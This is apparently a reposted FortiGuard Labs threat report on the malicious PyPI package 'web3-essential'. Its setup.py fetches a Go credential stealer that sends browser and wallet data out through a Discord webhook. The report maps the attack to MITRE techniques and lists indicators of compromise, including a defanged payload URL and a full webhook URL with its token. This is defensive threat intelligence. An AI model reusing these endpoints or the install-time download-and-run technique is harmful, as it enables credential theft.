Threat Research

Supply Chain Attack by New Malicious Python Package, “web3-essential” | FortiGuard Labs

Securonix

FortiGuard Labs detected a zero-day in a PyPI package named “web3-essential,” published by a newly joined user known as ‘Trexon’ on January 26, 2023. The package downloads and executes a Go-based binary to steal sensitive data and exfiltrate it via a Discord webhook. #web3-essential #Trexon

Keypoints

  • The FortiGuard Labs team identified a new 0-day in a PyPI package called “web3-essential,” published on January 26, 2023 by author ‘Trexon’ who had just joined the repository.
  • The package includes malicious code in its setup.py installation script that downloads and runs an executable file as a part of its installation.
  • The downloaded executable appears to be a Go-compiled binary named ily.exe, which creates DB files in the %USER%AppDataLocalcloudflare-warp-cacheraw folder to record sensitive data and credentials.
  • Code strings inside the binary reference keywords such as ‘virus’, ‘wallets’, ‘browsers’, ‘login’, and ‘passwords’, indicating credential-stealing behavior across browsers and wallets.
  • An embedded Discord webhook URL and the use of a Go package ‘dishooks’ suggest data exfiltration via Discord, potentially linked to the “Spidey Bot” malware family.
  • Fortinet notes that the PyPI package was taken down after notification, and FortiGuard Web Filtering blocks the download URL associated with this threat.

MITRE Techniques

  • [T1195] Supply Chain – The malicious package was published by a newly joined author on the same day they joined the repository. ‘The author joined … and published on January 26, 2023’…
  • [T1105] Ingress Tool Transfer – The setup.py installation script downloads and runs an executable file as part of its installation. ‘downloads and runs an executable file as a part of its installation.’
  • [T1059] Command and Scripting Interpreter – The installer executes a downloaded binary as part of the installation process. ‘download and runs an executable file as a part of its installation.’
  • [T1074] Data Staged – The malware creates DB files in the ‘%USER%AppDataLocalcloudflare-warp-cacheraw’ folder to record sensitive data and credentials. ‘creates DB files in the … folder. This may be used for recording sensitive data and credentials.’
  • [T1555.003] Credentials from Web Browsers – The binary contains keywords such as ‘browsers’, ‘login’, and ‘passwords’, indicating credential access from browser data. ‘keywords of interest include, ‘virus’, ‘wallets’, ‘browsers’, ‘login’, and ‘passwords’.’
  • [T1567.002] Exfiltration to Web Services – The malware uses a Discord webhook URL and the Go package ‘dishooks’, implying data exfiltration via Discord. ‘It uses a Go package, ‘dishooks’, which is a Discord webhook API wrapper. Within the URL, we see that it may be related to a “Spidey Bot” malware which is known to steal personal information through Discord.’

Indicators of Compromise

  • [File] ily.exe – The downloaded malicious binary. ily.exe
  • [Hash] 43c89b9263f78ef870bf205e92f7912c8b2845d33391b46cd747d45a5632aea0
  • [URL] hxxps://cdn[.]discordapp[.]com/attachments/1068100530498449468/1068239485613125702/ily[.]exe
  • [URL] hxxps://discordapp[.]com/api/webhooks/1068100542682902558/9JUsLnJZLyEkc_bGS85KTa5M1VWZ2J496v6Ruo7oUclFE08osfXNZL_OK5YDGOPYHLFy

Read more: https://www.fortinet.com/blog/threat-research/supply-chain-attack-by-new-malicious-python-package-web3-essential